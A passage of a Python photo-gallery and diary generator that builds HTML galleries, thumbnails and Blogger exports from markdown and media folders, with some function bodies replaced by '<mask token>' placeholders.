self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\ndef relative_url(path, root):\n \"\"\"\n returns a normalized url to path relative from root\n \"\"\"\n try:\n url = os.path.relpath(path, root)\n except:\n error('Unable to make a relative url:', url, root)\n url = url.replace('\\\\', '/') if os.sep == '\\\\' else url\n return urllib.parse.quote(url)\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\ndef compose_html_reduced(args, posts, title, target):\n html = list()\n html.append(START % title)\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n html.append(END)\n return html\n\n\ndef compose_html_full(args, posts, title, target):\n html = list()\n html.append(START % title)\n if args.diary:\n html.append(BUTTONS)\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n html.append('<script>')\n for post in posts:\n if post.medias:\n gallery_id = f'gallery-blog-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n if post.dcim:\n gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n html.append('</script>')\n html.append(END)\n return html\n\n\ndef print_html_to_stream(args, posts, title, stream, target):\n if target == 'regular':\n for line in compose_html_full(args, posts, title, target):\n print(line, file=stream)\n else:\n for line in compose_html_reduced(args, posts, title, target):\n print(line, file=stream)\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n if html_name:\n if os.path.exists(html_name):\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\ndef is_video_file(name):\n return os.path.splitext(name)[1].lower() in ('.mp4', '.webm', '.mkv',\n '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx')\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\ndef validate_date(datestr):\n try:\n datetime.datetime.strptime(datestr, '%Y%m%d')\n return True\n except ValueError:\n return False\n\n\ndef date_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\ndef format_duration(duration):\n mn = duration // 60\n sec = duration % 60\n if mn <= 59:\n return f'm:s={mn:02}:{sec:02}'\n else:\n hour = mn // 60\n mn = mn % 60\n return f'h:m:s={hour:02}:{mn:02}:{sec:02}'\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\ndef make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir\n ):\n print('Making thumbnail:', thumb_name)\n create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir)\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\ndef mosaic_geometry(size, thumblist):\n if len(thumblist) == 1:\n widthnum = 1\n heightnum = 1\n elif len(thumblist) <= 3:\n widthnum = 1\n heightnum = 2\n elif len(thumblist) <= 8:\n widthnum = 2\n heightnum = 2\n else:\n widthnum = 3\n heightnum = 3\n if widthnum == 1:\n width = [size[0] - 2]\n else:\n width = [size[0] // widthnum - 2] * (widthnum - 1)\n width.append(size[0] - (1 + sum(width) + 2 * len(width) + 1))\n if heightnum == 1:\n height = [size[1] - 2]\n else:\n height = [size[1] // heightnum - 2] * (heightnum - 1)\n height.append(size[1] - (1 + sum(height) + 2 * len(height) + 1))\n offsetx = [1]\n for w in width[:-1]:\n offsetx.append(offsetx[-1] + w + 2)\n offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\ndef make_posts(args, dirname):\n if args.diary is True:\n if not args.sourcedir:\n return make_posts_from_diary(args)\n else:\n return make_posts_from_diary_and_dir(args)\n elif args.bydate is False:\n return make_posts_from_subdir(args, dirname)\n else:\n return make_posts_from_subdir_and_date(args, dirname)\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n return bydate\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\ndef make_posts_from_subdir_and_date(args, dirname):\n if args.bydir is False:\n medias = list_of_medias(args, dirname, args.recursive)\n subdirs = []\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n medias = [_ for _ in medias_ext if is_media(_)]\n subdirs = [_ for _ in medias_ext if not is_media(_)]\n posts = list()\n items = list()\n for media_fullname in subdirs:\n item = create_item(args, media_fullname, args.sourcedir, args.\n thumbdir, 'dcim', 300)\n if item:\n items.append(item)\n if items:\n post = Post(date='00000000', text='', medias=[])\n post.dcim = items\n posts.append(post)\n bydate = create_items_by_date(args, medias, posts)\n for date in sorted(bydate):\n post = Post.from_date(date)\n post.dcim = bydate[post.date]\n posts.append(post)\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith(\n 'https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>',\n buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get('href')\n thumb = elem_a.img.get('src')\n online_images[os.path.basename(href)] = href, thumb\n online_videos = list()\n for match in re.finditer(\n '<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer,\n flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n html = compose_blogger_html(args, title, posts, online_images,\n online_videos)\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef getconfig(options, config_filename):\n\n\n class Section:\n pass\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n config = MyConfigParser()\n config.read(config_filename)\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source',\n 'github_pages', default=False)\n options.thumbnails.media_description = config.getboolean('thumbnails',\n 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails',\n 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails',\n 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails',\n 'threshold_htmlfiles', default=3)\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox',\n 'wheelNextPrev')\n\n\ndef setconfig(cfgname, section, key, value):\n config = MyConfigParser()\n config.read(cfgname)\n config.set(section, key, value)\n with open(cfgname, 'wt') as configfile:\n config.write(configfile)\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , 